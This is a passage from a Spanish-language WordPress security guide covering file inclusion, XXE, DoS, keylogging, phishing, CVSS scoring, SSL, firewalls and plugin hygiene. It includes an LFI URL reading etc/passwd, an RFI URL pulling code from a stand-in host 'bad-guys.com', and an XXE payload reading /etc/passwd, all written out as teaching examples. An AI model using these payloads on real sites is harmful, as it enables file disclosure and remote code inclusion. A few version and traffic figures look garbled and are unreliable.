La forma más fácil de mitigar una vulnerabilidad RCE es validar la entrada del usuario filtrando y eliminando los caracteres no deseados.

Nuestra empresa matriz Liquid Web tiene un excelente artículo sobre cómo prevenir la ejecución remota de código.

14. Vulnerabilidad de inclusión de archivos

Una vulnerabilidad de inclusión de archivos se produce cuando una aplicación web permite al usuario enviar información a archivos o cargar archivos en el servidor.

Hay dos tipos de vulnerabilidades de inclusión de archivos, local y remota.

15. Vulnerabilidad de inclusión de archivos locales

Una vulnerabilidad LFI o de inclusión de archivos locales permite a un atacante leer y, a veces, ejecutar archivos en el servidor de un sitio web.

Ejemplo de inclusión de archivos locales

Echemos otro vistazo a yourfavesite.com , donde las rutas que se pasan para include declaraciones no se desinfectan adecuadamente. Por ejemplo, echemos un vistazo a la URL a continuación.

 yourfavesite.com/module.php?file=example.file

Es posible que un atacante cambie el parámetro de URL para acceder a un archivo arbitrario en el servidor.

 yourfavesite.com/module.php?file=etc/passwd

Cambiar el valor del archivo en la URL podría permitir que un atacante vea el contenido del archivo psswd.

Cómo prevenir la inclusión de archivos locales

Cree una lista permitida de archivos que la página puede incluir, luego use un identificador para acceder al archivo seleccionado. Y luego bloquee cualquier solicitud que contenga un identificador no válido.

16. Vulnerabilidad de inclusión de archivos remotos

Una vulnerabilidad de inclusión remota de archivos o RFI permite a un atacante incluir un archivo, por lo general explotando los mecanismos de “inclusión dinámica de archivos” implementados en la aplicación de destino.

Ejemplo de inclusión de archivos remotos

El plugin de WordPress WP con Spritz se cerró en el repositorio de WordPress.org porque tenía una vulnerabilidad de RFI.

A continuación se muestra el código fuente de la vulnerabilidad:

 if(isset($_GET['url'])){ $content=file_get_contents($_GET['url']);

El código puede explotarse cambiando el valor del valor content.filter.php?url= . Por ejemplo:

 yoursite.com//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://bad-guys.com/exec

Prevención de inclusión de archivos remotos

Cree una lista permitida de archivos que la página puede incluir, luego use un identificador para acceder al archivo seleccionado. Y luego bloquee cualquier solicitud que contenga un identificador no válido.

17. Vulnerabilidad transversal de directorio

Una vulnerabilidad de Directory Traversal o File Traversal permite a un atacante leer archivos arbitrarios en el servidor que está ejecutando una aplicación.

Ejemplo de recorrido de directorio

Las versiones 5.7 - 5.03 de WordPress eran vulnerables a los ataques transversales de directorio porque no pudieron verificar los datos de entrada del usuario correctamente. Un atacante con acceso a una cuenta con al menos privilegios de author podría aprovechar la vulnerabilidad de cruce de directorios y ejecutar código PHP malicioso en el servidor subyacente, lo que provocaría una toma de control remota completa.

Cómo prevenir el cruce de directorios

Los desarrolladores pueden utilizar índices en lugar de partes reales de los nombres de los archivos al crear plantillas o utilizar archivos de idioma.

18. Vulnerabilidad de redireccionamiento malicioso

Una vulnerabilidad de redireccionamiento malicioso permite a un atacante inyectar código para redirigir a los visitantes del sitio a otro sitio web.

Ejemplo de redireccionamiento malicioso

Digamos que está buscando un suéter azul usando la herramienta de búsqueda en una boutique en línea.

Desafortunadamente, el servidor de la boutique no codifica correctamente las entradas del usuario y un atacante pudo inyectar un script de redireccionamiento malicioso en su consulta de búsqueda.

Por lo tanto, cuando escribe suéter azul en el campo de búsqueda de la boutique y presiona Intro, termina en la página web del atacante en lugar de en la página de la boutique con suéteres que coinciden con la descripción de su búsqueda.

Cómo prevenir el redireccionamiento malintencionado

Puede protegerse contra los redireccionamientos maliciosos desinfectando las entradas de los usuarios, validando las URL y obteniendo la confirmación del visitante para todos los redireccionamientos externos.

19. Vulnerabilidad de entidad externa XML

Una vulnerabilidad de entidad externa XXE o XML permite a un atacante engañar a un analizador XML para que transmita información confidencial a una entidad externa bajo su control.

Ejemplo de entidad externa XML

Un atacante podría aprovechar una vulnerabilidad XXE para obtener acceso a archivos confidenciales como etc / passwd, que almacena información de la cuenta del usuario.

 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

Cómo prevenir una entidad externa XML

La mejor forma de prevenir XXE es utilizar formatos de datos menos complejos como JSON y evitar la serialización de datos confidenciales.

20. Ataque de denegación de servicio

Un ataque DoS o de denegación de servicio es un intento deliberado de hacer que su sitio web o aplicación no esté disponible para los usuarios al inundarlo con tráfico de red.

En un ataque de denegación de servicio distribuido DDoS , un atacante utiliza múltiples fuentes para inundar una red con tráfico. Un atacante secuestrará grupos de computadoras, enrutadores y dispositivos de IoT infectados con malware para aumentar el flujo de tráfico.

Ejemplo de ataque de denegación de servicio

El ataque DDoS (denegación de servicio distribuido) más grande de la historia se impuso contra AWS en febrero de este año. Amazon informó que AWS Shield, su servicio administrado de protección contra amenazas, observó y mitigó este enorme ataque DDoS. El ataque duró 3 días y alcanzó un máximo de 2,3 terabytes por segundo.

Cómo prevenir un ataque de denegación de servicio

Hay 2 formas principales de mitigar un ataque DoS.

1. Compra más hosting del que necesitas. Tener recursos adicionales a su disposición puede ayudarlo a capear la mayor demanda causada por un ataque DoS.
2. Utilice un cortafuegos a nivel de servidor como Cloudflare. Un firewall puede detectar un pico inusual en el tráfico y evitar que su sitio web se sobrecargue.

21. Registro de pulsaciones de teclas

El registro de pulsaciones de teclas , también conocido como registro de teclas o captura de teclado, se produce cuando un pirata informático supervisa y registra de forma encubierta las pulsaciones de teclas de los visitantes del sitio web.

Ejemplo de registro de pulsaciones de teclas

En 2017, un pirata informático instaló JavaScript malicioso en el servidor del fabricante de teléfonos inteligentes OnePlus.

Usando el código malicioso, los atacantes monitorearon y registraron las pulsaciones de teclas de los clientes de OnePlus cuando ingresaron los detalles de su tarjeta de crédito. Los piratas informáticos registraron y recopilaron las pulsaciones de teclas de 40.000 clientes antes de que OnePlus detectara y parcheara el pirateo.

Cómo prevenir el registro de pulsaciones de teclas

¡Actualiza todo! Por lo general, un atacante necesitará aprovechar otra vulnerabilidad existente para inyectar un registrador de teclas en una computadora o servidor. Mantener todo actualizado con los últimos parches de seguridad evitará que los piratas informáticos puedan instalar un registrador de pulsaciones de teclas en su sitio web o computadora.

Bono: phishing

Las vulnerabilidades del software son lo único que los piratas informáticos y los ciberdelincuentes intentan explotar. Los piratas informáticos también se dirigen a los seres humanos y los explotan. Un método común de explotación es el phishing.

¿Qué es el phishing?

El phishing es un método de ataque cibernético que utiliza el correo electrónico, las redes sociales, los mensajes de texto y las llamadas telefónicas para engañar a la víctima para que proporcione información personal. El atacante utilizará la información para acceder a cuentas personales o cometer fraude de identidad.

Cómo detectar un correo electrónico de phishing

Como aprendimos anteriormente en esta publicación, algunas vulnerabilidades requieren algún tipo de interacción del usuario para explotarlas. Una forma en que un hacker engaña a las personas para que participen en sus nefastos esfuerzos es enviando correos electrónicos de phishing.

Aprender a detectar un correo electrónico de suplantación de identidad (phishing) puede salvarlo de participar inadvertidamente en los planes de los ciberdelincuentes.

4 consejos para detectar un correo electrónico de phishing :

1. Mire la dirección de correo electrónico del remitente : si recibe un correo electrónico de una empresa, la parte de la dirección de correo electrónico del remitente después de la “@” debe coincidir con el nombre de la empresa.
   
   Si un correo electrónico representa a una empresa o entidad gubernamental, pero utiliza una dirección de correo electrónico pública como "@gmail", es una señal de un correo electrónico de suplantación de identidad.
   
   Esté atento a los sutiles errores ortográficos del nombre de dominio. Por ejemplo, veamos esta dirección de correo electrónico [email protected] Podemos ver que Netflix tiene una "x" adicional al final. El error ortográfico es una clara señal de que el correo electrónico fue enviado por un estafador y debe eliminarse de inmediato.
   
2. Busque errores gramaticales : un correo electrónico lleno de errores gramaticales es una señal de un correo electrónico malicioso. Todas las palabras pueden estar escritas correctamente, pero a las oraciones les faltan palabras que harían que la oración sea coherente. Por ejemplo, “Su cuenta ha sido pirateada. Actualice la contraseña a la seguridad de la cuenta ”.
   
   Todos cometemos errores, y no todos los correos electrónicos con un error tipográfico o dos son un intento de estafarlo. Sin embargo, múltiples errores gramaticales merecen una mirada más de cerca antes de responder.
   
3. Archivos adjuntos o enlaces sospechosos : vale la pena hacer una pausa por un momento antes de interactuar con los archivos adjuntos o enlaces incluidos en un correo electrónico.
   
   Si no reconoce al remitente de un correo electrónico, no debe descargar ningún archivo adjunto incluido en el correo electrónico, ya que podría contener malware e infectar su computadora. Si el correo electrónico dice ser de una empresa, puede buscar en Google su información de contacto para verificar que el correo electrónico fue enviado por ellos antes de abrir cualquier archivo adjunto.
   
   Si un correo electrónico contiene un enlace, puede colocar el mouse sobre el enlace para verificar que la URL lo esté enviando a donde debería estar.
   
4. Tenga cuidado con las solicitudes urgentes : un truco común utilizado por los estafadores es crear una sensación de urgencia. Un correo electrónico malintencionado puede generar un escenario que requiera una acción inmediata. Cuanto más tiempo tenga para pensar, mayor será la posibilidad de que identifique que la solicitud proviene de un estafador.
   
   Es posible que reciba un correo electrónico de su "jefe" pidiéndole que le pague a un proveedor lo antes posible o de su banco informándole que su cuenta ha sido pirateada y que se requiere una acción inmediata.

Cómo medir la gravedad de una vulnerabilidad de WordPress

Hay varios tipos de vulnerabilidades de WordPress, todas con distintos grados de riesgo. Afortunadamente para nosotros, la Base de Datos Nacional de Vulnerabilidad, un proyecto del Instituto Nacional de Ciencia y Tecnología, tiene una calculadora de sistema de puntuación de vulnerabilidad para determinar el riesgo de una vulnerabilidad.

Esta sección de la guía de vulnerabilidades de WordPress cubrirá las métricas y los niveles de gravedad del sistema de puntuación de vulnerabilidades. Si bien esta sección es un poco más técnica, algunos usuarios pueden encontrarla útil para profundizar su comprensión de cómo se evalúan las vulnerabilidades de WordPress y su gravedad.

Métricas comunes del sistema de puntuación de vulnerabilidades de WordPress

La ecuación del sistema de puntuación de vulnerabilidad utiliza tres conjuntos diferentes de puntuaciones para determinar la puntuación de gravedad general.

1. Métricas base

El grupo de métricas base representa las características de una vulnerabilidad que son constantes en todos los entornos de usuario.

Las métricas base se dividen en dos grupos, explotabilidad e impacto.

1.1. Métricas de explotabilidad

La puntuación de explotabilidad se basa en lo difícil que es para un atacante aprovechar la vulnerabilidad. La puntuación se calcula utilizando 5 variables diferentes.

1.1.1. Vector de ataque (AV)

La puntuación del vector de ataque se basa en el método en el que se explota la vulnerabilidad. La puntuación será mayor cuanto más remoto esté un atacante para aprovechar la vulnerabilidad.

La idea es que el número de atacantes potenciales será mucho mayor si la vulnerabilidad puede explotarse a través de una red en comparación con una vulnerabilidad que requiere acceso físico a un exploit de dispositivo.

Cuantos más atacantes potenciales haya, mayor será el riesgo de explotación y, por lo tanto, la puntuación del Vector de ataque otorgada a la vulnerabilidad será mayor.

1.1.2. Complejidad de ataque (AC)

El valor de complejidad se basa en las condiciones necesarias para aprovechar la vulnerabilidad. Algunas condiciones pueden requerir la recopilación de más información sobre el destino, la presencia de ciertos parámetros de configuración del sistema o excepciones computacionales.

La puntuación de complejidad del ataque será mayor cuanto menor sea la complejidad necesaria para aprovechar la vulnerabilidad.

1.1.3. Privilegios requeridos (PR)

La puntuación de privilegios requeridos se calcula en función de los privilegios que un atacante debe obtener antes de explotar una vulnerabilidad. Nos sumergiremos un poco más en esto en la sección Autenticados frente a no autenticados.

La puntuación será más alta si no se requieren privilegios.

1.1.4. Interacción del usuario (UI)

La puntuación de interacción del usuario se determina en función de si una vulnerabilidad requiere o no la interacción del usuario para explotarla.

La puntuación será más alta cuando no se requiera la interacción del usuario para que un atacante aproveche la vulnerabilidad.

1.1.5. Alcance

La puntuación del alcance se basa en una vulnerabilidad en un componente de software para afectar los recursos más allá de su alcance de seguridad.

El ámbito de seguridad abarca otros componentes que proporcionan funcionalidad únicamente a ese componente, incluso si estos otros componentes tienen su propia autoridad de seguridad.

La puntuación es más alta cuando se produce un cambio de alcance.

1.2. Métricas de impacto

Las métricas de impacto capturan los efectos directos de una vulnerabilidad explotada con éxito.

1.2.1. Impacto confidencial (C)

Esta puntuación de impacto confidencial mide el impacto en la confidencialidad de la información gestionada por el software explotado.

La puntuación es más alta cuando la pérdida del software afectado es más alta.

1.2.2. Integridad (I)

Esta puntuación de integridad se basa en el impacto en la integridad de una vulnerabilidad explotada con éxito.

La puntuación es más alta cuando la consecuencia del software afectado es mayor.

1.2.3. Disponibilidad (A)

La puntuación de disponibilidad se basa en el impacto de la disponibilidad del software explotado.

La puntuación es más alta cuando la consecuencia del componente afectado es mayor.

Puntaje base Cálculo de puntaje CVSS

La puntuación base es una función de las ecuaciones de subpuntuaciones de impacto y explotabilidad. Donde la puntuación base se define como,

 If (Impact sub score <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02] 15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

2. Métricas de puntuación temporal

Las métricas temporales miden el estado actual de las técnicas de explotación, la existencia de parches o soluciones alternativas, o la confianza que uno tiene en la descripción de una vulnerabilidad.

Se espera que las métricas temporales cambien con el tiempo.

2.1. Vencimiento del código de explotación (E)

La madurez del código de explotación se basa en la probabilidad de que la vulnerabilidad sea atacada.

Cuanto más fácil se pueda explotar una vulnerabilidad, mayor será la puntuación de vulnerabilidad.

2.2. Nivel de remediación (RL)

El nivel de corrección de una vulnerabilidad es un factor importante para la priorización. Las soluciones provisionales o las revisiones pueden ofrecer una solución provisional hasta que se emita un parche o actualización oficial.

Cuanto menos oficial y permanente sea una solución, mayor será la puntuación de vulnerabilidad.

2.3. Informe de confianza (RC)

La métrica Report Confidence mide el nivel de confianza de que existe una vulnerabilidad y la credibilidad de los detalles técnicos.

Cuanto más una vulnerabilidad sea validada por el proveedor u otras fuentes acreditadas, mayor será la puntuación.

Cálculo de la puntuación CVSS temporal

La puntuación temporal se define como,

 Roundup(BaseScore v× ExploitCode Maturity × RemediationLevel × ReportConfidence)

3. Métricas de puntuación medioambiental

Las métricas ambientales permiten a los analistas personalizar la puntuación CVSS en función de la importancia de los activos de TI afectados.

Las métricas de Explotación e Impacto Ambiental son un equivalente modificado de las métricas Base y se les asignan valores basados ​​en la ubicación de los componentes de la infraestructura organizacional. Consulte las secciones de Métricas base anteriores para ver los valores y descripciones de las métricas de Explotación e Impacto.

Las métricas medioambientales contienen un grupo adicional, modificadores de subpuntuaciones de impacto.

3.1. Métricas de modificadores de subpuntuaciones de impacto

Las métricas de Impact Subscore Modifiers evalúan los requisitos de seguridad específicos para Confidencialidad (CR), Integridad (IR) y Disponibilidad (AR), lo que permite ajustar la puntuación ambiental de acuerdo con el entorno de los usuarios.

Cálculo de la puntuación CVSS medioambiental

La puntuación ambiental se define como,

 If (Modified Impact Sub score <= 0) 0 else, If Modified Scope is Unchanged Round up(Round up (Minimum [ (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) If Modified Scope is Changed Round up(Round up (Minimum [1.08 × (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) And the modified Impact sub score is defined as, If Modified Scope is Unchanged 6.42 × [ISC Modified ] If Modified Scope is Changed 7.52 × [ISC Modified - 0.029]-3.25× [ISC Modified × 0.9731 - 0.02] 13 Where, ISC Modified = Minimum [[1 - (1 - M.IConf × CR) × (1 - M.IInteg × IR) × (1 - M.IAvail × AR)], 0.915] The Modified Exploitability sub score is, 8.22 × M.AttackVector × M.AttackComplexity × M.PrivilegeRequired × M.UserInteraction 4 Where “Round up” is defined as the smallest number, specified to one decimal place, that is equal to or higher than its input. For example, Round up (4.02) is 4.1; and Round up (4.00) is 4.0.

Puntaje general de CVSS y gravedad

La puntuación general del sistema de puntuación de vulnerabilidad común o CVSS es una representación de las puntuaciones base, temporal y ambiental.

La puntuación general de CVSS se puede utilizar para darle una idea de la gravedad de una vulnerabilidad.

Ejemplo de clasificación de gravedad CVSS del mundo real

En nuestro Resumen de vulnerabilidades de diciembre de 2020, informamos sobre una vulnerabilidad en el complemento Easy WP SMTP. La vulnerabilidad de día cero (cubriremos las vulnerabilidades de día cero en la siguiente sección) permitió que un atacante tomara el control de una cuenta de administrador y estaba siendo explotado en la naturaleza.

Echando un vistazo a la entrada de la Base de datos nacional de vulnerabilidades, podemos encontrar la clasificación de gravedad de la vulnerabilidad WP SMTP.

Analicemos un par de cosas de la captura de pantalla de WP SMTP NVDB anterior.

Puntuación base : la puntuación base es 7.5, lo que nos indica que la clasificación de gravedad de la vulnerabilidad es alta.

Vector : el vector nos dice que la puntuación se basa en las ecuaciones de vulnerabilidad CVSS 3.1 y las métricas utilizadas para calcular la puntuación.

Aquí está la porción de métricas del vector.

 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Ahora usemos los valores y las descripciones de la métrica base de anteriormente en esta publicación para comprender los ocho valores métricos del vector.

1. AV: N : esto significa que el vector de ataque (AV) de la vulnerabilidad es la red (N). En otras palabras, un atacante solo necesita acceso a la red para aprovechar la vulnerabilidad.
2. AC: L - La complejidad de ataque (AC) de la vulnerabilidad es Baja (L). En otras palabras, cualquier script kiddie puede aprovechar la vulnerabilidad.
3. PR: N : los privilegios requeridos (PR) necesarios para explotar la vulnerabilidad son Ninguno (N). Por lo tanto, la vulnerabilidad no requiere un usuario autenticado para explotarla. (Cubriremos la diferencia entre las vulnerabilidades autenticadas y no autenticadas más adelante en esta publicación).
4. UI: N : la interacción del usuario (UI) necesaria para aprovechar esta vulnerabilidad es Ninguna (N). Entonces, el atacante tiene los medios para explotar la vulnerabilidad por sí mismo.
5. S: U - Esto significa que el Alcance (S) de la vulnerabilidad no ha cambiado (U). En el caso de esta vulnerabilidad, el componente vulnerable y el componente afectado son los mismos.
6. C: H - El impacto de confidencialidad (C) de la vulnerabilidad es alto (H). Cuando se explota esta vulnerabilidad, resulta en una pérdida total de confidencialidad.
7. I: N : el impacto en la integridad (I) de esta vulnerabilidad es Ninguno (N). Cuando se explota la vulnerabilidad, no hay pérdida de integridad o confiabilidad de la información vulnerable.
8. R: N : esto significa que el impacto en la disponibilidad (A) es Ninguno (N). Cuando se explota la vulnerabilidad, no habrá ningún impacto en la disponibilidad de su sitio web.

La puntuación CVSS puede ayudarnos a determinar la gravedad y el alcance de una vulnerabilidad determinada. En las siguientes secciones, cubriremos algunos términos de vulnerabilidad importantes que a menudo se incluyen en las divulgaciones de vulnerabilidades.

Terminando

En esta sección, aprendimos varios elementos importantes de la seguridad de WordPress, incluidas las motivaciones de los piratas informáticos, los diferentes tipos de piratas informáticos, las vulnerabilidades que explotan los delincuentes en línea, cómo mitigar el riesgo de vulnerabilidades y cómo determinar el riesgo que una vulnerabilidad representa para usted. sitio web.

Comprender cómo los atacantes intentan piratear nuestros sitios web y su objetivo después de violar nuestros sitios web nos permite construir las defensas adecuadas.

En las próximas secciones, aprenderá cómo puede proteger su sitio web de casi todos los tipos de ataques que un hacker puede lanzarle.

Sección 4: Protección de su servidor

El primer paso en su estrategia de seguridad de WordPress es proteger su servidor. Su servidor almacena todos los archivos y códigos que hacen que su sitio web funcione.

En esta sección aprenderá:

1. La importancia de elegir un buen anfitrión.
2. Cómo cifrar las comunicaciones en su sitio web.
3. Cómo un firewall puede ayudar a proteger su sitio.

Elija el alojamiento adecuado

No todos los servidores web se crean de la misma manera y elegir uno únicamente en función del precio puede terminar costándote mucho más a largo plazo con los problemas de seguridad de WordPress. La mayoría de los entornos de alojamiento compartido son seguros, pero algunos no separan adecuadamente las cuentas de usuario.

Su anfitrión debe estar atento a la aplicación de los últimos parches de seguridad y seguir otras importantes prácticas recomendadas de seguridad de WordPress relacionadas con la seguridad del servidor y de los archivos. Su anfitrión debe estar atento a la aplicación de los últimos parches de seguridad y seguir otras importantes prácticas recomendadas de seguridad de alojamiento relacionadas con la seguridad de archivos y servidores.

Cifre su sitio de WordPress con SSL

Secure Sockets Layer, también conocida como SSL, es una tecnología de seguridad que proporciona cifrado entre un cliente y un servidor web. Para entender esto de manera un poco más simple, un "cliente" es un navegador web como Chrome o Safari, y un "servidor web" es su sitio web o tienda en línea.

Una manera fácil de saber si el sitio web que está visitando tiene un certificado SSL instalado es mirar en la barra de direcciones de su navegador para ver si la URL comienza con HTTP o HTTPS. Si la URL comienza con HTTPS, está navegando de forma segura en un sitio que utiliza SSL.

¿Por qué es tan importante SSL?

No tener un certificado SSL en 2021 es caro. ¿Por qué? Si no tiene SSL habilitado en su sitio web, será más difícil para los clientes potenciales descubrir su existencia, y aquellos que encuentren su sitio pueden tener miedo de darle dinero.

Cada vez que hacemos una compra en línea, existe una comunicación entre su navegador y la tienda en línea. Por ejemplo, cuando ingresamos nuestro número de tarjeta de crédito en nuestro navegador, nuestro navegador compartirá el número con la tienda en línea. Una vez que la tienda recibe el pago, le indica a su navegador que le avise que su compra se realizó correctamente.

Una cosa a tener en cuenta sobre la información compartida entre nuestro navegador y el servidor de la tienda es que la información hace varias paradas en el tránsito. SSL proporciona encriptación a la comunicación para asegurar que nuestra tarjeta de crédito no sea vista hasta que llegue al destino final del servidor de la tienda.

Para comprender mejor cómo funciona el cifrado, piense en cómo se entregan nuestras compras. Si alguna vez ha seguido el estado de entrega de una compra en línea, habrá visto que su pedido se detiene varias veces antes de llegar a su hogar. Si el vendedor no empaquetó correctamente su compra, sería fácil para las personas ver lo que compró.

SSL es una herramienta crucial para evitar que los delincuentes intercepten información confidencial como contraseñas y números de tarjetas de crédito que se comparten entre el cliente y el servidor web.

¿Por qué un certificado SSL es imprescindible para cada sitio web?

Los beneficios de seguridad de WordPress que obtiene al tener un certificado SSL en su sitio web son suficientes para que sea imprescindible para cualquier sitio web. Sin embargo, para alentar a todos a proteger a los visitantes de su sitio, los navegadores web y los motores de búsqueda han creado incentivos negativos para alentar a todos a usar SSL. En esta sección, cubriremos las costosas consecuencias de no habilitar SSL en su sitio web.

1. No tener SSL habilitado perjudicará su clasificación de SEO

La optimización de motores de búsqueda o SEO es el proceso de optimizar su sitio web para que se descubra orgánicamente a través de las páginas de resultados de los motores de búsqueda. El beneficio del SEO es que es una excelente manera de aumentar el tráfico orgánico y no pagado a su sitio. Si vende un curso de panificación, desea que su sitio web esté en la primera página de resultados para alguien que busque en Google, o Duck Duck Go para un curso de panificación.

Sin SSL habilitado en su sitio, los motores de búsqueda lo penalizarán y degradarán su clasificación. Una de las métricas que utiliza Google para clasificar los sitios web en sus resultados de búsqueda es la confiabilidad. Lo mejor para Google es no enviar a sus usuarios a sitios web inseguros, por lo que la confiabilidad tiene un gran peso en su algoritmo de clasificación. Dado que SSL agrega tanta seguridad, es una parte importante de cómo Google califica la confiabilidad de un sitio web.

2. Los navegadores marcan los sitios que no son SSL como no seguros

Otra forma en que no tener SSL habilitado le costará es que el navegador de su visitante les advertirá que su sitio no es seguro. Como mencionamos anteriormente, después de instalar un certificado SSL en su sitio web, la URL de su sitio cambiará de http : //yourwebsite.com a https: // yourwebsite / com. Chrome, por ejemplo, marcará las páginas web cifradas con HTTPS como seguras con un candado cerrado. Alternativamente, Chrome reemplazará el candado cerrado para todas las páginas web no cifradas HTTP con el texto Not Secure .

No compraré en sitios web que mi navegador marque como inseguros, y no soy el único que no lo hará. Según un estudio de GlobalSign, el 85% de los compradores online evitan los sitios web no seguros. Tenga en cuenta que en 2021 es vital que todos sus sitios utilicen HTTPS y no solo sus páginas de inicio de sesión y pago. Es posible que un cliente potencial no acceda a un pago seguro si las páginas de la tienda están marcadas como No seguras en su navegador web.

3. Puede perder clientes potenciales

La protección de sus clientes es la razón esencial para habilitar SSL en su sitio web. Si están dispuestos a confiarte su negocio, lo mínimo que puedes hacer es recompensar esa confianza protegiéndolos con el poder del cifrado.

Si un pirata informático puede robar los datos de la tarjeta de crédito de su cliente debido a la falta de cifrado en su sitio web, no solo perderá su confianza, sino que también perderá parte de sus negocios futuros.

¿Cómo puedo saber si mi sitio web tiene SSL habilitado?

Una manera fácil de saber si su sitio web tiene un certificado SSL instalado es mirar en la barra de direcciones de su navegador para ver si la URL comienza con HTTP o HTTPS. Si la URL comienza con HTTPS, su sitio web está protegido con SSL.

También puede utilizar un verificador SSL como SSL Labs. Un verificador de SSL escaneará su sitio en busca de un certificado SSL y le informará cuando su certificado SSL caduque.

¿Cómo puedo instalar un certificado SSL en mi sitio web de WordPress?

Si su sitio web de WordPress carece de SSL, lo primero que debe hacer es pedirle a su proveedor de alojamiento que vea si proporciona un certificado SSL y una configuración gratuitos. En 2021, la mayoría de las empresas de alojamiento incluyen SSL en sus paquetes de alojamiento. Por ejemplo, iThemes Hosting proporciona y administra SSL para cada sitio web.

Si su anfitrión no le proporciona un certificado SSL gratuito, no se preocupe, todavía hay muchas otras opciones.

Cloudflare ofrece un certificado SSL compartido gratuito para sitios web de WordPress. Si prefiere no tener un certificado SSL compartido y se siente cómodo con la línea de comandos, CertBot es una excelente opción. Certbot no solo crea un certificado SSL gratuito usando Let's Encrypt para usted, sino que también administrará automáticamente la renovación del certificado por usted.

Tener SSL habilitado en su sitio web de WordPress es imprescindible en 2021. SSL asegura la comunicación entre usted y sus clientes, mejora su SEO y brinda a los visitantes de su sitio la comodidad de estar seguros mientras navegan por su sitio web.

Utilice un firewall de aplicaciones web

El uso de un firewall de aplicaciones web es una excelente manera de agregar otra capa de protección a su sitio web de WordPress.

¿Qué es un firewall de aplicaciones web?

Un WAF o firewall de aplicaciones web ayuda a proteger su sitio web al monitorear el tráfico de Internet dirigido a su sitio web antes de que llegue a su sitio web.

Al agregar un WAF delante de WordPress, está agregando un punto de control de seguridad entre Internet y su sitio web. Antes de que el tráfico pueda acceder a su sitio web, debe pasar por WAF.

Si el WAF detecta tráfico malicioso, como CSRF, XSS, inyecciones de SQL y más, lo filtrará antes de que llegue a su sitio web. No solo eso, sino que un WAF puede ayudar a detectar un ataque DDoS e implementar una limitación de velocidad para evitar que su sitio web se bloquee.

Las 3 formas de implementar un WAF

Hay 3 formas diferentes de implementar un WAF. Echemos un vistazo a los pros y contras de cada tipo.

1. WAF basado en red: un WAF físico o basado en red está basado en hardware. La principal ventaja de un WAF basado en red es la baja latencia que se obtiene al instalarse localmente. Sin embargo, la desventaja proviene del precio del almacenamiento y mantenimiento del equipo físico. El precio y los requisitos de almacenamiento físico hacen que esta sea una mala elección para la mayoría de las personas.
2. WAF basado en host: un WAF local o basado en host se integra en WordPress, generalmente mediante un complemento. La ventaja de un WAF basado en host es que es menos costoso que un WAF basado en red. La desventaja de un WAF local son los requisitos de los recursos de su servidor. Y con el filtrado de tráfico en su sitio web, puede resultar en tiempos de carga de página más lentos para los visitantes de su sitio web.
3. WAF basado en la nube: un WAF basado en la nube suele ser la mejor opción para la mayoría de las personas. La ventaja de un WAF basado en la nube es que son asequibles, no requieren que lo administres. Además, con el tráfico que se filtra antes de que llegue a su sitio web, no consumirá los recursos de su servidor ni ralentizará su sitio web. Cloudflare y Sucuri son proveedores populares de firewall basados ​​en la nube.

Terminando

En esta sección, aprendimos por qué es tan importante elegir el host correcto, cómo proteger la comunicación entre nuestro sitio web y sus visitantes, y cómo un WAF puede ayudar a bloquear el tráfico malicioso para que no llegue a nuestro sitio web.

En la próxima sección, aprenderá las mejores prácticas para mantener seguro su software de WordPress.

Sección 5: Seguridad del software de WordPress

Cada vez que instala un nuevo complemento o tema, introduce un nuevo código que tiene el potencial de ser explotado por piratas informáticos. En esta sección, aprenderá lo que se debe y no se debe hacer al administrar WordPress, complementos y temas.

1. Solo instale software de fuentes confiables

Solo instale complementos y temas de WordPress de fuentes confiables. Solo debe instalar software que obtenga de WordPress.org, repositorios comerciales conocidos o directamente de desarrolladores de renombre. Deberá evitar la versión "anulada" de los complementos comerciales porque pueden contener código malicioso. No importa cómo bloquee su sitio de WordPress si es usted quien instala el malware.

Si el complemento o tema de WordPress no se distribuye en el sitio web del desarrollador, querrá hacer su debida diligencia antes de descargar el complemento. Comuníquese con los desarrolladores para ver si están afiliados de alguna manera con el sitio web que ofrece su producto a un precio gratuito o con descuento.

2. Elimine el complemento y los temas no utilizados

Tener complementos y temas sin usar o inactivos en su sitio web es un error de seguridad importante de WordPress. Cada fragmento de código en su sitio web es un punto de entrada potencial para un pirata informático.

Es una práctica común que los desarrolladores utilicen código de terceros, como bibliotecas JS, en sus complementos y temas. Desafortunadamente, si las bibliotecas no se mantienen adecuadamente, pueden crear vulnerabilidades que los atacantes pueden aprovechar para piratear su sitio web.

Nota: Utilice iThemes Sync Pro Site Audit para comprobar sus páginas web en busca de bibliotecas de JavaScript de front-end con vulnerabilidades de seguridad conocidas.

Desinstale y elimine por completo los complementos y temas innecesarios en su sitio de WordPress para limitar la cantidad de puntos de acceso y código ejecutable en su sitio web.

3. Mantenga actualizado su software de WordPress

Mantener el software actualizado es una parte esencial de cualquier estrategia de seguridad de WordPress. Las actualizaciones no son solo para corregir errores y nuevas funciones. Las actualizaciones también pueden incluir parches de seguridad críticos. Sin ese parche, deja su teléfono, computadora, servidor, enrutador o sitio web vulnerable a los ataques.

Tener un complemento o tema vulnerable para el que hay un parche disponible pero no se aplica es el principal culpable de los sitios web de WordPress pirateados. Esto significa que la mayoría de las vulnerabilidades se explotan DESPUÉS de la publicación de un parche para la vulnerabilidad.

La violación de Equifax, altamente reportada, podría haberse evitado si hubieran actualizado su software. Para la violación de Equifax, simplemente no había excusa.

Algo tan simple como actualizar su software puede protegerlo. Así que no ignore esas actualizaciones de WordPress, las actualizaciones son uno de los componentes más básicos de la seguridad de WordPress y de toda la seguridad web.

Parche martes

